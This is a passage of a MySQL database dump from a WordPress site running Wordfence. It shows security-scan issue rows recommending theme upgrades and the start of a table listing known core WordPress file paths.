released.','a:7:{s:10:\"newVersion\";s:5:\"1.5.2\";s:7:\"package\";s:55:\"https://downloads.wordpress.org/theme/nirvana.1.5.2.zip\";s:3:\"URL\";s:37:\"https://wordpress.org/themes/nirvana/\";s:4:\"Name\";s:7:\"Nirvana\";s:4:\"name\";s:7:\"Nirvana\";s:7:\"version\";s:5:\"1.3.2\";s:10:\"vulnerable\";b:0;}'),(204,1624620601,1624620601,'new','wfThemeUpgrade',50,'6fa339277c7e054658832495eb7e561c','6fa339277c7e054658832495eb7e561c','The Theme \"Panoramic\" needs an upgrade (1.0.19 -> 1.1.15).','You need to upgrade \"Panoramic\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:6:\"1.1.15\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/theme/panoramic.1.1.15.zip\";s:3:\"URL\";s:39:\"https://wordpress.org/themes/panoramic/\";s:4:\"Name\";s:9:\"Panoramic\";s:4:\"name\";s:9:\"Panoramic\";s:7:\"version\";s:6:\"1.0.19\";s:10:\"vulnerable\";b:0;}'),(205,1624620601,1624620601,'new','wfThemeUpgrade',50,'e30fca26fce18d96749df5170e5f810a','e30fca26fce18d96749df5170e5f810a','The Theme \"Point\" needs an upgrade (2.0.3 -> 2.1.1).','You need to upgrade \"Point\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"2.1.1\";s:7:\"package\";s:53:\"https://downloads.wordpress.org/theme/point.2.1.1.zip\";s:3:\"URL\";s:35:\"https://wordpress.org/themes/point/\";s:4:\"Name\";s:5:\"Point\";s:4:\"name\";s:5:\"Point\";s:7:\"version\";s:5:\"2.0.3\";s:10:\"vulnerable\";b:0;}'),(206,1624620601,1624620601,'new','wfThemeUpgrade',50,'6d51ad0cf8ea10b7084d09e28d680129','6d51ad0cf8ea10b7084d09e28d680129','The Theme \"Precious Lite\" needs an upgrade (1.2.6 -> 1.3.2).','You need to upgrade \"Precious Lite\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"1.3.2\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/theme/precious-lite.1.3.2.zip\";s:3:\"URL\";s:43:\"https://wordpress.org/themes/precious-lite/\";s:4:\"Name\";s:13:\"Precious Lite\";s:4:\"name\";s:13:\"Precious Lite\";s:7:\"version\";s:5:\"1.2.6\";s:10:\"vulnerable\";b:0;}'),(207,1624620601,1624620601,'new','wfThemeUpgrade',50,'ee9f174176897abb9c6a40dc49fe5c5b','ee9f174176897abb9c6a40dc49fe5c5b','The Theme \"Relia\" needs an upgrade (1.0.7 -> 1.2.0).','You need to upgrade \"Relia\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"1.2.0\";s:7:\"package\";s:53:\"https://downloads.wordpress.org/theme/relia.1.2.0.zip\";s:3:\"URL\";s:35:\"https://wordpress.org/themes/relia/\";s:4:\"Name\";s:5:\"Relia\";s:4:\"name\";s:5:\"Relia\";s:7:\"version\";s:5:\"1.0.7\";s:10:\"vulnerable\";b:0;}'),(208,1624620601,1624620601,'new','wfThemeUpgrade',50,'8c3bd09c6618edb429806b816c3de1dd','8c3bd09c6618edb429806b816c3de1dd','The Theme \"SG Window\" needs an upgrade (1.2.1 -> 1.2.3).','You need to upgrade \"SG Window\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"1.2.3\";s:7:\"package\";s:57:\"https://downloads.wordpress.org/theme/sg-window.1.2.3.zip\";s:3:\"URL\";s:39:\"https://wordpress.org/themes/sg-window/\";s:4:\"Name\";s:9:\"SG Window\";s:4:\"name\";s:9:\"SG Window\";s:7:\"version\";s:5:\"1.2.1\";s:10:\"vulnerable\";b:0;}'),(209,1624620601,1624620601,'new','wfThemeUpgrade',50,'0bf96193bc2b6bfdec546c881a6cc785','0bf96193bc2b6bfdec546c881a6cc785','The Theme \"Square\" needs an upgrade (1.3.2 -> 1.8.7).','You need to upgrade \"Square\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"1.8.7\";s:7:\"package\";s:54:\"https://downloads.wordpress.org/theme/square.1.8.7.zip\";s:3:\"URL\";s:36:\"https://wordpress.org/themes/square/\";s:4:\"Name\";s:6:\"Square\";s:4:\"name\";s:6:\"Square\";s:7:\"version\";s:5:\"1.3.2\";s:10:\"vulnerable\";b:0;}'),(210,1624620601,1624620601,'new','wfThemeUpgrade',50,'8e31c2bd18b709d7494a61c554dd9bc1','8e31c2bd18b709d7494a61c554dd9bc1','The Theme \"SuperNews\" needs an upgrade (1.0.6 -> 3.0.3).','You need to upgrade \"SuperNews\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"3.0.3\";s:7:\"package\";s:57:\"https://downloads.wordpress.org/theme/supernews.3.0.3.zip\";s:3:\"URL\";s:39:\"https://wordpress.org/themes/supernews/\";s:4:\"Name\";s:9:\"SuperNews\";s:4:\"name\";s:9:\"SuperNews\";s:7:\"version\";s:5:\"1.0.6\";s:10:\"vulnerable\";b:0;}'),(211,1624620601,1624620601,'new','wfThemeUpgrade',50,'afb14cf65898ccd8ae52b86696d86316','afb14cf65898ccd8ae52b86696d86316','The Theme \"The Minimal\" needs an upgrade (1.1.2 -> 1.2.4).','You need to upgrade \"The Minimal\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"1.2.4\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/theme/the-minimal.1.2.4.zip\";s:3:\"URL\";s:41:\"https://wordpress.org/themes/the-minimal/\";s:4:\"Name\";s:11:\"The Minimal\";s:4:\"name\";s:11:\"The Minimal\";s:7:\"version\";s:5:\"1.1.2\";s:10:\"vulnerable\";b:0;}'),(212,1624620601,1624620601,'new','wfThemeUpgrade',50,'d8b73564472eca5a1b7b116c9e8fa9c3','d8b73564472eca5a1b7b116c9e8fa9c3','The Theme \"Tortuga\" needs an upgrade (1.1.4 -> 2.3.1).','You need to upgrade \"Tortuga\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"2.3.1\";s:7:\"package\";s:55:\"https://downloads.wordpress.org/theme/tortuga.2.3.1.zip\";s:3:\"URL\";s:37:\"https://wordpress.org/themes/tortuga/\";s:4:\"Name\";s:7:\"Tortuga\";s:4:\"name\";s:7:\"Tortuga\";s:7:\"version\";s:5:\"1.1.4\";s:10:\"vulnerable\";b:0;}'),(213,1624620601,1624620601,'new','wfThemeUpgrade',50,'b6b7d7879b88596ded45f1879461e8a9','b6b7d7879b88596ded45f1879461e8a9','The Theme \"Travelify\" needs an upgrade (3.0.4 -> 3.0.8).','You need to upgrade \"Travelify\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"3.0.8\";s:7:\"package\";s:57:\"https://downloads.wordpress.org/theme/travelify.3.0.8.zip\";s:3:\"URL\";s:39:\"https://wordpress.org/themes/travelify/\";s:4:\"Name\";s:9:\"Travelify\";s:4:\"name\";s:9:\"Travelify\";s:7:\"version\";s:5:\"3.0.4\";s:10:\"vulnerable\";b:0;}'),(218,1624620601,1624620601,'new','wfThemeUpgrade',50,'dbc764d14d936ccaf4516f2bb64e10ef','dbc764d14d936ccaf4516f2bb64e10ef','The Theme \"Vega\" needs an upgrade (1.9.5 -> 3.0.0).','You need to upgrade \"Vega\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"3.0.0\";s:7:\"package\";s:52:\"https://downloads.wordpress.org/theme/vega.3.0.0.zip\";s:3:\"URL\";s:34:\"https://wordpress.org/themes/vega/\";s:4:\"Name\";s:4:\"Vega\";s:4:\"name\";s:4:\"Vega\";s:7:\"version\";s:5:\"1.9.5\";s:10:\"vulnerable\";b:0;}'),(219,1624620601,1624620601,'new','wfThemeUpgrade',50,'1a6538a18416504d3a699cee3a9a04be','1a6538a18416504d3a699cee3a9a04be','The Theme \"Verbosa\" needs an upgrade (0.9.6 -> 1.2.1.1).','You need to upgrade \"Verbosa\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:7:\"1.2.1.1\";s:7:\"package\";s:57:\"https://downloads.wordpress.org/theme/verbosa.1.2.1.1.zip\";s:3:\"URL\";s:37:\"https://wordpress.org/themes/verbosa/\";s:4:\"Name\";s:7:\"Verbosa\";s:4:\"name\";s:7:\"Verbosa\";s:7:\"version\";s:5:\"0.9.6\";s:10:\"vulnerable\";b:0;}'),(220,1624620601,1624620601,'new','wfThemeUpgrade',50,'27e477d34fa7452ff5f1506060ef6b19','27e477d34fa7452ff5f1506060ef6b19','The Theme \"WEN Business\" needs an upgrade (1.4.1 -> 1.7.2).','You need to upgrade \"WEN Business\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"1.7.2\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/theme/wen-business.1.7.2.zip\";s:3:\"URL\";s:42:\"https://wordpress.org/themes/wen-business/\";s:4:\"Name\";s:12:\"WEN Business\";s:4:\"name\";s:12:\"WEN Business\";s:7:\"version\";s:5:\"1.4.1\";s:10:\"vulnerable\";b:0;}');
/*!40000 ALTER TABLE `wp_wfissues` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfknownfilelist`
--

DROP TABLE IF EXISTS `wp_wfknownfilelist`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfknownfilelist` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `path` text NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=7532 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfknownfilelist`
--

LOCK TABLES `wp_wfknownfilelist` WRITE;
/*!40000 ALTER TABLE `wp_wfknownfilelist` DISABLE KEYS */;
INSERT INTO `wp_wfknownfilelist` VALUES (1,'index.php'),(2,'license.txt'),(3,'readme.html'),(4,'wp-activate.php'),(5,'wp-admin/about.php'),(6,'wp-admin/admin-ajax.php'),(7,'wp-admin/admin-footer.php'),(8,'wp-admin/admin-functions.php'),(9,'wp-admin/admin-header.php'),(10,'wp-admin/admin-post.php'),(11,'wp-admin/admin.php'),(12,'wp-admin/async-upload.php'),(13,'wp-admin/authorize-application.php'),(14,'wp-admin/comment.php'),(15,'wp-admin/credits.php'),(16,'wp-admin/css/about-rtl.css'),(17,'wp-admin/css/about-rtl.min.css'),(18,'wp-admin/css/about.css'),(19,'wp-admin/css/about.min.css'),(20,'wp-admin/css/admin-menu-rtl.css'),(21,'wp-admin/css/admin-menu-rtl.min.css'),(22,'wp-admin/css/admin-menu.css'),(23,'wp-admin/css/admin-menu.min.css'),(24,'wp-admin/css/code-editor-rtl.css'),(25,'wp-admin/css/code-editor-rtl.min.css'),(26,'wp-admin/css/code-editor.css'),(27,'wp-admin/css/code-editor.min.css'),(28,'wp-admin/css/color-picker-rtl.css'),(29,'wp-admin/css/color-picker-rtl.min.css'),(30,'wp-admin/css/color-picker.css'),(31,'wp-admin/css/color-picker.min.css'),(32,'wp-admin/css/colors/_admin.scss'),(33,'wp-admin/css/colors/_mixins.scss'),(34,'wp-admin/css/colors/_variables.scss'),(35,'wp-admin/css/colors/blue/colors-rtl.css'),(36,'wp-admin/css/colors/blue/colors-rtl.min.css'),(37,'wp-admin/css/colors/blue/colors.css'),(38,'wp-admin/css/colors/blue/colors.min.css'),(39,'wp-admin/css/colors/blue/colors.scss'),(40,'wp-admin/css/colors/coffee/colors-rtl.css'),(41,'wp-admin/css/colors/coffee/colors-rtl.min.css'),(42,'wp-admin/css/colors/coffee/colors.css'),(43,'wp-admin/css/colors/coffee/colors.min.css'),(44,'wp-admin/css/colors/coffee/colors.scss'),(45,'wp-admin/css/colors/ectoplasm/colors-rtl.css'),(46,'wp-admin/css/colors/ectoplasm/colors-rtl.min.css'),(47,'wp-admin/css/colors/ectoplasm/colors.css'),(48,'wp-admin/css/colors/ectoplasm/colors.min.css'),(49,'wp-admin/css/colors/ectoplasm/colors.scss'),(50,'wp-admin/css/colors/light/colors-rtl.css'),(51,'wp-admin/css/colors/light/colors-rtl.min.css'),(52,'wp-admin/css/colors/light/colors.css'),(53,'wp-admin/css/colors/light/colors.min.css'),(54,'wp-admin/css/colors/light/colors.scss'),(55,'wp-admin/css/colors/midnight/colors-rtl.css'),(56,'wp-admin/css/colors/midnight/colors-rtl.min.css'),(57,'wp-admin/css/colors/midnight/colors.css'),(58,'wp-admin/css/colors/midnight/colors.min.css'),(59,'wp-admin/css/colors/midnight/colors.scss'),(60,'wp-admin/css/colors/modern/colors-rtl.css'),(61,'wp-admin/css/colors/modern/colors-rtl.min.css'),(62,'wp-admin/css/colors/modern/colors.css'),(63,'wp-admin/css/colors/modern/colors.min.css'),(64,'wp-admin/css/colors/modern/colors.scss'),(65,'wp-admin/css/colors/ocean/colors-rtl.css'),(66,'wp-admin/css/colors/ocean/colors-rtl.min.css'),(67,'wp-admin/css/colors/ocean/colors.css'),(68,'wp-admin/css/colors/ocean/colors.min.css'),(69,'wp-admin/css/colors/ocean/colors.scss'),(70,'wp-admin/css/colors/sunrise/colors-rtl.css'),(71,'wp-admin/css/colors/sunrise/colors-rtl.min.css'),(72,'wp-admin/css/colors/sunrise/colors.css'),(73,'wp-admin/css/colors/sunrise/colors.min.css'),(74,'wp-admin/css/colors/sunrise/colors.scss'),(75,'wp-admin/css/common-rtl.css'),(76,'wp-admin/css/common-rtl.min.css'),(77,'wp-admin/css/common.css'),(78,'wp-admin/css/common.min.css'),(79,'wp-admin/css/customize-controls-rtl.css'),(80,'wp-admin/css/customize-controls-rtl.min.css'),(81,'wp-admin/css/customize-controls.css'),(82,'wp-admin/css/customize-controls.min.css'),(83,'wp-admin/css/customize-nav-menus-rtl.css'),(84,'wp-admin/css/customize-nav-menus-rtl.min.css'),(85,'wp-admin/css/customize-nav-menus.css'),(86,'wp-admin/css/customize-nav-menus.min.css'),(87,'wp-admin/css/customize-widgets-rtl.css'),(88,'wp-admin/css/customize-widgets-rtl.min.css'),(89,'wp-admin/css/customize-widgets.css'),(90,'wp-admin/css/customize-widgets.min.css'),(91,'wp-admin/css/dashboard-rtl.css'),(92,'wp-admin/css/dashboard-rtl.min.css'),(93,'wp-admin/css/dashboard.css'),(94,'wp-admin/css/dashboard.min.css'),(95,'wp-admin/css/deprecated-media-rtl.css'),(96,'wp-admin/css/deprecated-media-rtl.min.css'),(97,'wp-admin/css/deprecated-media.css'),(98,'wp-admin/css/deprecated-media.min.css'),(99,'wp-admin/css/edit-rtl.css'),(100,'wp-admin/css/edit-rtl.min.css'),(101,'wp-admin/css/edit.css'),(102,'wp-admin/css/edit.min.css'),(103,'wp-admin/css/farbtastic-rtl.css'),(104,'wp-admin/css/farbtastic-rtl.min.css'),(105,'wp-admin/css/farbtastic.css'),(106,'wp-admin/css/farbtastic.min.css'),(107,'wp-admin/css/forms-rtl.css'),(108,'wp-admin/css/forms-rtl.min.css'),(109,'wp-admin/css/forms.css'),(110,'wp-admin/css/forms.min.css'),(111,'wp-admin/css/install-rtl.css'),(112,'wp-admin/css/install-rtl.min.css'),(113,'wp-admin/css/install.css'),(114,'wp-admin/css/install.min.css'),(115,'wp-admin/css/l10n-rtl.css'),(116,'wp-admin/css/l10n-rtl.min.css'),(117,'wp-admin/css/l10n.css'),(118,'wp-admin/css/l10n.min.css'),(119,'wp-admin/css/list-tables-rtl.css'),(120,'wp-admin/css/list-tables-rtl.min.css'),(121,'wp-admin/css/list-tables.css'),(122,'wp-admin/css/list-tables.min.css'),(123,'wp-admin/css/login-rtl.css'),(124,'wp-admin/css/login-rtl.min.css'),(125,'wp-admin/css/login.css'),(126,'wp-admin/css/login.min.css'),(127,'wp-admin/css/media-rtl.css'),(128,'wp-admin/css/media-rtl.min.css'),(129,'wp-admin/css/media.css'),(130,'wp-admin/css/media.min.css'),(131,'wp-admin/css/nav-menus-rtl.css'),(132,'wp-admin/css/nav-menus-rtl.min.css'),(133,'wp-admin/css/nav-menus.css'),(134,'wp-admin/css/nav-menus.min.css'),(135,'wp-admin/css/revisions-rtl.css'),(136,'wp-admin/css/revisions-rtl.min.css'),(137,'wp-admin/css/revisions.css'),(138,'wp-admin/css/revisions.min.css'),(139,'wp-admin/css/site-health-rtl.css'),(140,'wp-admin/css/site-health-rtl.min.css'),(141,'wp-admin/css/site-health.css'),(142,'wp-admin/css/site-health.min.css'),(143,'wp-admin/css/site-icon-rtl.css'),(144,'wp-admin/css/site-icon-rtl.min.css'),(145,'wp-admin/css/site-icon.css'),(146,'wp-admin/css/site-icon.min.css'),(147,'wp-admin/css/themes-rtl.css'),(148,'wp-admin/css/themes-rtl.min.css'),(149,'wp-admin/css/themes.css'),(150,'wp-admin/css/themes.min.css'),(151,'wp-admin/css/widgets-rtl.css'),(152,'wp-admin/css/widgets-rtl.min.css'),(153,'wp-admin/css/widgets.css'),(154,'wp-admin/css/widgets.min.css'),(155,'wp-admin/css/wp-admin-rtl.css'),(156,'wp-admin/css/wp-admin-rtl.min.css'),(157,'wp-admin/css/wp-admin.css'),(158,'wp-admin/css/wp-admin.min.css'),(159,'wp-admin/custom-background.php'),(160,'wp-admin/custom-header.php'),(161,'wp-admin/customize.php'),(162,'wp-admin/edit-comments.php'),(163,'wp-admin/edit-form-advanced.php'),(164,'wp-admin/edit-form-blocks.php'),(165,'wp-admin/edit-form-comment.php'),(166,'wp-admin/edit-link-form.php'),(167,'wp-admin/edit-tag-form.php'),(168,'wp-admin/edit-tags.php'),(169,'wp-admin/edit.php'),(170,'wp-admin/erase-personal-data.php'),(171,'wp-admin/export-personal-data.php'),(172,'wp-admin/export.php'),(173,'wp-admin/freedoms.php'),(174,'wp-admin/images/align-center-2x.png'),(175,'wp-admin/images/align-center.png'),(176,'wp-admin/images/align-left-2x.png'),(177,'wp-admin/images/align-left.png'),(178,'wp-admin/images/align-none-2x.png'),(179,'wp-admin/images/align-none.png'),(180,'wp-admin/images/align-right-2x.png'),(181,'wp-admin/images/align-right.png'),(182,'wp-admin/images/arrows-2x.png'),(183,'wp-admin/images/arrows.png'),(184,'wp-admin/images/browser-rtl.png'),(185,'wp-admin/images/browser.png'),(186,'wp-admin/images/bubble_bg-2x.gif'),(187,'wp-admin/images/bubble_bg.gif'),(188,'wp-admin/images/comment-grey-bubble-2x.png'),(189,'wp-admin/images/comment-grey-bubble.png'),(190,'wp-admin/images/date-button-2x.gif'),(191,'wp-admin/images/date-button.gif'),(192,'wp-admin/images/freedoms.png'),(193,'wp-admin/images/generic.png'),(194,'wp-admin/images/icons32-2x.png'),(195,'wp-admin/images/icons32-vs-2x.png'),(196,'wp-admin/images/icons32-vs.png'),(197,'wp-admin/images/icons32.png'),(198,'wp-admin/images/imgedit-icons-2x.png'),(199,'wp-admin/images/imgedit-icons.png'),(200,'wp-admin/images/list-2x.png'),(201,'wp-admin/images/list.png'),(202,'wp-admin/images/loading.gif'),(203,'wp-admin/images/marker.png'),(204,'wp-admin/images/mask.png'),(205,'wp-admin/images/media-button-2x.png'),(206,'wp-admin/images/media-button-image.gif'),(207,'wp-admin/images/media-button-music.gif'),(208,'wp-admin/images/media-button-other.gif'),(209,'wp-admin/images/media-button-video.gif'),(210,'wp-admin/images/media-button.png'),(211,'wp-admin/images/menu-2x.png'),(212,'wp-admin/images/menu-vs-2x.png'),(213,'wp-admin/images/menu-vs.png'),(214,'wp-admin/images/menu.png'),(215,'wp-admin/images/no.png'),(216,'wp-admin/images/post-formats-vs.png'),(217,'wp-admin/images/post-formats.png'),(218,'wp-admin/images/post-formats32-vs.png'),(219,'wp-admin/images/post-formats32.png'),(220,'wp-admin/images/privacy.png'),(221,'wp-admin/images/resize-2x.gif'),(222,'wp-admin/images/resize-rtl-2x.gif'),(223,'wp-admin/images/resize-rtl.gif'),(224,'wp-admin/images/resize.gif'),(225,'wp-admin/images/se.png'),(226,'wp-admin/images/sort-2x.gif'),(227,'wp-admin/images/sort.gif'),(228,'wp-admin/images/spinner-2x.gif'),(229,'wp-admin/images/spinner.gif'),(230,'wp-admin/images/stars-2x.png'),(231,'wp-admin/images/stars.png'),(232,'wp-admin/images/w-logo-blue.png'),(233,'wp-admin/images/w-logo-white.png'),(234,'wp-admin/images/wheel.png'),(235,'wp-admin/images/wordpress-logo-white.svg'),(236,'wp-admin/images/wordpress-logo.png'),(237,'wp-admin/images/wordpress-logo.svg'),(238,'wp-admin/images/wpspin_light-2x.gif'),(239,'wp-admin/images/wpspin_light.gif'),(240,'wp-admin/images/xit-2x.gif'),(241,'wp-admin/images/xit.gif'),(242,'wp-admin/images/yes.png'),(243,'wp-admin/import.php'),(244,'wp-admin/includes/admin-filters.php'),(245,'wp-admin/includes/admin.php'),(246,'wp-admin/includes/ajax-actions.php'),(247,'wp-admin/includes/bookmark.php'),(248,'wp-admin/includes/class-automatic-upgrader-skin.php'),(249,'wp-admin/includes/class-bulk-plugin-upgrader-skin.php'),(250,'wp-admin/includes/class-bulk-theme-upgrader-skin.php'),(251,'wp-admin/includes/class-bulk-upgrader-skin.php'),(252,'wp-admin/includes/class-core-upgrader.php'),(253,'wp-admin/includes/class-custom-background.php'),(254,'wp-admin/includes/class-custom-image-header.php'),(255,'wp-admin/includes/class-file-upload-upgrader.php'),(256,'wp-admin/includes/class-ftp-pure.php'),(257,'wp-admin/includes/class-ftp-sockets.php'),(258,'wp-admin/includes/class-ftp.php'),(259,'wp-admin/includes/class-language-pack-upgrader-skin.php'),(260,'wp-admin/includes/class-language-pack-upgrader.php'),(261,'wp-admin/includes/class-pclzip.php'),(262,'wp-admin/includes/class-plugin-installer-skin.php'),(263,'wp-admin/includes/class-plugin-upgrader-skin.php'),(264,'wp-admin/includes/class-plugin-upgrader.php'),(265,'wp-admin/includes/class-theme-installer-skin.php'),(266,'wp-admin/includes/class-theme-upgrader-skin.php'),(267,'wp-admin/includes/class-theme-upgrader.php'),(268,'wp-admin/includes/class-walker-category-checklist.php'),(269,'wp-admin/includes/class-walker-nav-menu-checklist.php'),(270,'wp-admin/includes/class-walker-nav-menu-edit.php'),(271,'wp-admin/includes/class-wp-ajax-upgrader-skin.php'),(272,'wp-admin/includes/class-wp-application-passwords-list-table.php'),(273,'wp-admin/includes/class-wp-automatic-updater.php'),(274,'wp-admin/includes/class-wp-comments-list-table.php'),(275,'wp-admin/includes/class-wp-community-events.php'),(276,'wp-admin/includes/class-wp-debug-data.php'),(277,'wp-admin/includes/class-wp-filesystem-base.php'),(278,'wp-admin/includes/class-wp-filesystem-direct.php'),(279,'wp-admin/includes/class-wp-filesystem-ftpext.php'),(280,'wp-admin/includes/class-wp-filesystem-ftpsockets.php'),(281,'wp-admin/includes/class-wp-filesystem-ssh2.php'),(282,'wp-admin/includes/class-wp-importer.php'),(283,'wp-admin/includes/class-wp-internal-pointers.php'),(284,'wp-admin/includes/class-wp-links-list-table.php'),(285,'wp-admin/includes/class-wp-list-table-compat.php'),(286,'wp-admin/includes/class-wp-list-table.php'),(287,'wp-admin/includes/class-wp-media-list-table.php'),(288,'wp-admin/includes/class-wp-ms-sites-list-table.php'),(289,'wp-admin/includes/class-wp-ms-themes-list-table.php'),(290,'wp-admin/includes/class-wp-ms-users-list-table.php'),(291,'wp-admin/includes/class-wp-plugin-install-list-table.php'),(292,'wp-admin/includes/class-wp-plugins-list-table.php'),(293,'wp-admin/includes/class-wp-post-comments-list-table.php'),(294,'wp-admin/includes/class-wp-posts-list-table.php'),(295,'wp-admin/includes/class-wp-privacy-data-export-requests-list-table.php'),(296,'wp-admin/includes/class-wp-privacy-data-removal-requests-list-table.php'),(297,'wp-admin/includes/class-wp-privacy-policy-content.php'),(298,'wp-admin/includes/class-wp-privacy-requests-table.php'),(299,'wp-admin/includes/class-wp-screen.php'),(300,'wp-admin/includes/class-wp-site-health-auto-updates.php'),(301,'wp-admin/includes/class-wp-site-health.php'),(302,'wp-admin/includes/class-wp-site-icon.php'),(303,'wp-admin/includes/class-wp-terms-list-table.php'),(304,'wp-admin/includes/class-wp-theme-install-list-table.php'),(305,'wp-admin/includes/class-wp-themes-list-table.php'),(306,'wp-admin/includes/class-wp-upgrader-skin.php'),(307,'wp-admin/includes/class-wp-upgrader-skins.php'),(308,'wp-admin/includes/class-wp-upgrader.php'),(309,'wp-admin/includes/class-wp-users-list-table.php'),(310,'wp-admin/includes/comment.php'),(311,'wp-admin/includes/continents-cities.php'),(312,'wp-admin/includes/credits.php'),(313,'wp-admin/includes/dashboard.php'),(314,'wp-admin/includes/deprecated.php'),(315,'wp-admin/includes/edit-tag-messages.php'),(316,'wp-admin/includes/export.php'),(317,'wp-admin/includes/file.php'),(318,'wp-admin/includes/image-edit.php'),(319,'wp-admin/includes/image.php'),(320,'wp-admin/includes/import.php'),(321,'wp-admin/includes/list-table.php'),(322,'wp-admin/includes/media.php'),(323,'wp-admin/includes/menu.php'),(324,'wp-admin/includes/meta-boxes.php'),(325,'wp-admin/includes/misc.php'),(326,'wp-admin/includes/ms-admin-filters.php'),(327,'wp-admin/includes/ms-deprecated.php'),(328,'wp-admin/includes/ms.php'),(329,'wp-admin/includes/nav-menu.php'),(330,'wp-admin/includes/network.php'),(331,'wp-admin/includes/noop.php'),(332,'wp-admin/includes/options.php'),(333,'wp-admin/includes/plugin-install.php'),(334,'wp-admin/includes/plugin.php'),(335,'wp-admin/includes/post.php'),(336,'wp-admin/includes/privacy-tools.php'),(337,'wp-admin/includes/revision.php'),(338,'wp-admin/includes/schema.php'),(339,'wp-admin/includes/screen.php'),(340,'wp-admin/includes/taxonomy.php'),(341,'wp-admin/includes/template.php'),(342,'wp-admin/includes/theme-install.php'),(343,'wp-admin/includes/theme.php'),(344,'wp-admin/includes/translation-install.php'),(345,'wp-admin/includes/update-core.php'),(346,'wp-admin/includes/update.php'),(347,'wp-admin/includes/upgrade.php'),(348,'wp-admin/includes/user.php'),(349,'wp-admin/includes/widgets.php'),(350,'wp-admin/index.php'),(351,'wp-admin/install-helper.php'),(352,'wp-admin/install.php'),(353,'wp-admin/js/accordion.js'),(354,'wp-admin/js/accordion.min.js'),(355,'wp-admin/js/application-passwords.js'),(356,'wp-admin/js/application-passwords.min.js'),(357,'wp-admin/js/auth-app.js'),(358,'wp-admin/js/auth-app.min.js'),(359,'wp-admin/js/code-editor.js'),(360,'wp-admin/js/code-editor.min.js'),(361,'wp-admin/js/color-picker.js'),(362,'wp-admin/js/color-picker.min.js'),(363,'wp-admin/js/comment.js'),(364,'wp-admin/js/comment.min.js'),(365,'wp-admin/js/common.js'),(366,'wp-admin/js/common.min.js'),(367,'wp-admin/js/custom-background.js'),(368,'wp-admin/js/custom-background.min.js'),(369,'wp-admin/js/custom-header.js'),(370,'wp-admin/js/customize-controls.js'),(371,'wp-admin/js/customize-controls.min.js'),(372,'wp-admin/js/customize-nav-menus.js'),(373,'wp-admin/js/customize-nav-menus.min.js'),(374,'wp-admin/js/customize-widgets.js'),(375,'wp-admin/js/customize-widgets.min.js'),(376,'wp-admin/js/dashboard.js'),(377,'wp-admin/js/dashboard.min.js'),(378,'wp-admin/js/edit-comments.js'),(379,'wp-admin/js/edit-comments.min.js'),(380,'wp-admin/js/editor-expand.js'),(381,'wp-admin/js/editor-expand.min.js'),(382,'wp-admin/js/editor.js'),(383,'wp-admin/js/editor.min.js'),(384,'wp-admin/js/farbtastic.js'),(385,'wp-admin/js/gallery.js'),(386,'wp-admin/js/gallery.min.js'),(387,'wp-admin/js/image-edit.js'),(388,'wp-admin/js/image-edit.min.js'),(389,'wp-admin/js/inline-edit-post.js'),(390,'wp-admin/js/inline-edit-post.min.js'),(391,'wp-admin/js/inline-edit-tax.js'),(392,'wp-admin/js/inline-edit-tax.min.js'),(393,'wp-admin/js/iris.min.js'),(394,'wp-admin/js/language-chooser.js'),(395,'wp-admin/js/language-chooser.min.js'),(396,'wp-admin/js/link.js'),(397,'wp-admin/js/link.min.js'),(398,'wp-admin/js/media-gallery.js'),(399,'wp-admin/js/media-gallery.min.js'),(400,'wp-admin/js/media-upload.js'),(401,'wp-admin/js/media-upload.min.js'),(402,'wp-admin/js/media.js'),(403,'wp-admin/js/media.min.js'),(404,'wp-admin/js/nav-menu.js'),(405,'wp-admin/js/nav-menu.min.js'),(406,'wp-admin/js/password-strength-meter.js'),(407,'wp-admin/js/password-strength-meter.min.js'),(408,'wp-admin/js/plugin-install.js'),(409,'wp-admin/js/plugin-install.min.js'),(410,'wp-admin/js/post.js'),(411,'wp-admin/js/post.min.js'),(412,'wp-admin/js/postbox.js'),(413,'wp-admin/js/postbox.min.js'),(414,'wp-admin/js/privacy-tools.js'),(415,'wp-admin/js/privacy-tools.min.js'),(416,'wp-admin/js/revisions.js'),(417,'wp-admin/js/revisions.min.js'),(418,'wp-admin/js/set-post-thumbnail.js'),(419,'wp-admin/js/set-post-thumbnail.min.js'),(420,'wp-admin/js/site-health.js'),(421,'wp-admin/js/site-health.min.js'),(422,'wp-admin/js/svg-painter.js'),(423,'wp-admin/js/svg-painter.min.js'),(424,'wp-admin/js/tags-box.js'),(425,'wp-admin/js/tags-box.min.js'),(426,'wp-admin/js/tags-suggest.js'),(427,'wp-admin/js/tags-suggest.min.js'),(428,'wp-admin/js/tags.js'),(429,'wp-admin/js/tags.min.js'),(430,'wp-admin/js/theme-plugin-editor.js'),(431,'wp-admin/js/theme-plugin-editor.min.js'),(432,'wp-admin/js/theme.js'),(433,'wp-admin/js/theme.min.js'),(434,'wp-admin/js/updates.js'),(435,'wp-admin/js/